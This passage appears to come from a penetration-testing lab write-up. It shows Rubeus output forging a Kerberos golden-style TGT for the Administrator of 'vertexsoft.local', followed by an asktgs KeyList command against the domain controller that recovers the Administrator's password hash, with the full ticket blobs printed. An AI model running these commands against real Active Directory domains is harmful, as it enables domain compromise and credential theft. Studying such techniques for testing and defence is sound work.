[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : 34E335179246EF930DC33FD1E3DE6E9E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 34E335179246EF930DC33FD1E3DE6E9E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : vertexsoft.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@vertexsoft.local'

[*] AuthTime       : 1/23/2026 12:45:14 AM
[*] StartTime      : 1/23/2026 12:45:14 AM
[*] EndTime        : 1/23/2026 10:45:14 AM
[*] RenewTill      : 1/30/2026 12:45:14 AM

[*] base64(ticket.kirbi):

      doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELoKzb+PkW3EYmwomEc3t1w4VGLaCNUGvnuks2UhHorQfEjIxzY29xl/X1B7j10yhedzB1eWLcccCw2HZ6vHQiOF+uls8cgQnQso0F7LJAfuGpHA95g7cDanliapWdmMJdKX3m6gPd9Xlc0TTDw6HI+62KxMKw4XJIEnf4BeYB++iFB61SbE4Zr9JjttF5bq5Lv28ljcr/1pkeKkSlxNqn63PufgsiTqqb70GZ1hpXBXazmBRAZCRdVf2lO/l4qIja6ISPm2mp10HKdN4J7a9DOCYMffvCKvFxL6Wjzd8J7gZabRJt9EIP9asl2BPEvkKjIBaMx8Eh42McSuh0jkWs1IMpMoT9xMXmiMnPC2C8Mlhsd3QvS5VmvgAK27XvW9HK7PcZkkWwP1MHHY+KzJueZMv6fvuOaUGj+fJvHLwRUD/RdjFKYUz2yWo8/djyUrDQhTVPOqbw0hBYmESjSuLjZAuTUlX8MBWqE0FZOc/+DlKwzYOItbblJLkjpGsUO0+BwVdLwubZalX5K+Xeq0d5gPC12Sxfc+pSkcB5n8nUlG3Sl6EHn/PKaTu24FczcYNGZht3pfZISJBXZ4K63Fd7/1TI6czqoQ2MzIL9PF2ot5DhRSxGaC3TFoeT48u04xrfWmzhQNMCu1XQkKgMjDCnFB5btnKTH1EWYFHz9KlmxwknARTsoyOc4Sb8EtLkkRPYImsDhEMGqkvf17HKln+/wwDjlv8ozr4SzPgaYCeSf+aahzGqDPAE50YtZKeF4evgNNd6YH6qTsmUaksS65i7p7e/QEWMtfgz3/3ge/fC1DcLoxAX7lqn8WeVEodASuCeSmqluY6wKeFi62YDFhm5bY4TxDGo9Kqt4+0auwM34jn9RBe6JeY4raPzUf6zEDFabvjCOURPGpw6Gi9AnXkKyf7QQVue6AVJP/DBQIcgewSSY8YvLf4FG18hdiX5JMTGYYPmQMnAhLB8YhhnlZHNYfrydMdh5pwJJ+145MD9jMWsYagkYWRFcW4fJmTDFyY1yaBTNKsdA9shwWpjpZS97eEFpPXPeDHzoOWq+jy5Dc1gsVZ6muLsl6m63+uCZsGjtriG6QqlxExNPAXAIrgSUkrT/zXVA/iiDkVV2VcyjDpGbazuNMJqs9w6ZvQhIPUiX5TFZUu659DmntSDlqLAz/uaOAhutvB8gEq5ZgE/Hx0PiphlQZjGRZsu/kGokx94kYapIgt1AUsQcoPSM64pD2Fsa1nLAjBz35yFrDdLvrA1iZ3UckAV4xkljtDvj8n5UIYo86dcZWfn7uiG0Mls0sEihukxM4l5tJzAJPiYdF4kFMc/W2e7k8KRzjsp7lCdsDPO8VwHUNrSwd1Nu+amOPR0oZkHN+t7LBPSwAeMJTmUaP7fy798LQBDJLR38eZduCVpDFcyLx6Q6nC1FUeo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQa/cb042YAReAeKzVzIw3daESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2NDUxNFqlERgPMjAyNjAxMjIxNjQ1MTRaphEYDzIwMjYwMTIzMDI0NTE0WqcRGA8yMDI2MDEyOTE2NDUxNFqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==


PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELoKzb+PkW3EYmwomEc3t1w4VGLaCNUGvnuks2UhHorQfEjIxzY29xl/X1B7j10yhedzB1eWLcccCw2HZ6vHQiOF+uls8cgQnQso0F7LJAfuGpHA95g7cDanliapWdmMJdKX3m6gPd9Xlc0TTDw6HI+62KxMKw4XJIEnf4BeYB++iFB61SbE4Zr9JjttF5bq5Lv28ljcr/1pkeKkSlxNqn63PufgsiTqqb70GZ1hpXBXazmBRAZCRdVf2lO/l4qIja6ISPm2mp10HKdN4J7a9DOCYMffvCKvFxL6Wjzd8J7gZabRJt9EIP9asl2BPEvkKjIBaMx8Eh42McSuh0jkWs1IMpMoT9xMXmiMnPC2C8Mlhsd3QvS5VmvgAK27XvW9HK7PcZkkWwP1MHHY+KzJueZMv6fvuOaUGj+fJvHLwRUD/RdjFKYUz2yWo8/djyUrDQhTVPOqbw0hBYmESjSuLjZAuTUlX8MBWqE0FZOc/+DlKwzYOItbblJLkjpGsUO0+BwVdLwubZalX5K+Xeq0d5gPC12Sxfc+pSkcB5n8nUlG3Sl6EHn/PKaTu24FczcYNGZht3pfZISJBXZ4K63Fd7/1TI6czqoQ2MzIL9PF2ot5DhRSxGaC3TFoeT48u04xrfWmzhQNMCu1XQkKgMjDCnFB5btnKTH1EWYFHz9KlmxwknARTsoyOc4Sb8EtLkkRPYImsDhEMGqkvf17HKln+/wwDjlv8ozr4SzPgaYCeSf+aahzGqDPAE50YtZKeF4evgNNd6YH6qTsmUaksS65i7p7e/QEWMtfgz3/3ge/fC1DcLoxAX7lqn8WeVEodASuCeSmqluY6wKeFi62YDFhm5bY4TxDGo9Kqt4+0auwM34jn9RBe6JeY4raPzUf6zEDFabvjCOURPGpw6Gi9AnXkKyf7QQVue6AVJP/DBQIcgewSSY8YvLf4FG18hdiX5JMTGYYPmQMnAhLB8YhhnlZHNYfrydMdh5pwJJ+145MD9jMWsYagkYWRFcW4fJmTDFyY1yaBTNKsdA9shwWpjpZS97eEFpPXPeDHzoOWq+jy5Dc1gsVZ6muLsl6m63+uCZsGjtriG6QqlxExNPAXAIrgSUkrT/zXVA/iiDkVV2VcyjDpGbazuNMJqs9w6ZvQhIPUiX5TFZUu659DmntSDlqLAz/uaOAhutvB8gEq5ZgE/Hx0PiphlQZjGRZsu/kGokx94kYapIgt1AUsQcoPSM64pD2Fsa1nLAjBz35yFrDdLvrA1iZ3UckAV4xkljtDvj8n5UIYo86dcZWfn7uiG0Mls0sEihukxM4l5tJzAJPiYdF4kFMc/W2e7k8KRzjsp7lCdsDPO8VwHUNrSwd1Nu+amOPR0oZkHN+t7LBPSwAeMJTmUaP7fy798LQBDJLR38eZduCVpDFcyLx6Q6nC1FUeo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQa/cb042YAReAeKzVzIw3daESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2NDUxNFqlERgPMjAyNjAxMjIxNjQ1MTRaphEYDzIwMjYwMTIzMDI0NTE0WqcRGA8yMDI2MDEyOTE2NDUxNFqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGS

[*] Requesting 'rc4_hmac' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: DC.vertexsoft.local (192.168.1.11)
[+] TGS request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/VERTEXSOFT.LOCAL
  ServiceRealm             :  VERTEXSOFT.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  VERTEXSOFT.LOCAL
  StartTime                :  1/23/2026 12:45:31 AM
  EndTime                  :  1/23/2026 10:45:14 AM
  RenewTill                :  1/1/0001 8:00:00 AM
  Flags                    :  name_canonicalize, pre_authent
  KeyType                  :  rc4_hmac
  Base64(key)              :  HAm0llxNsQLPoVUV1+Qhhg==
  Password Hash            :  EBC447441306783742EE3DF769051B75


PS C:\Users\CharlieCloud\Desktop>

10. reference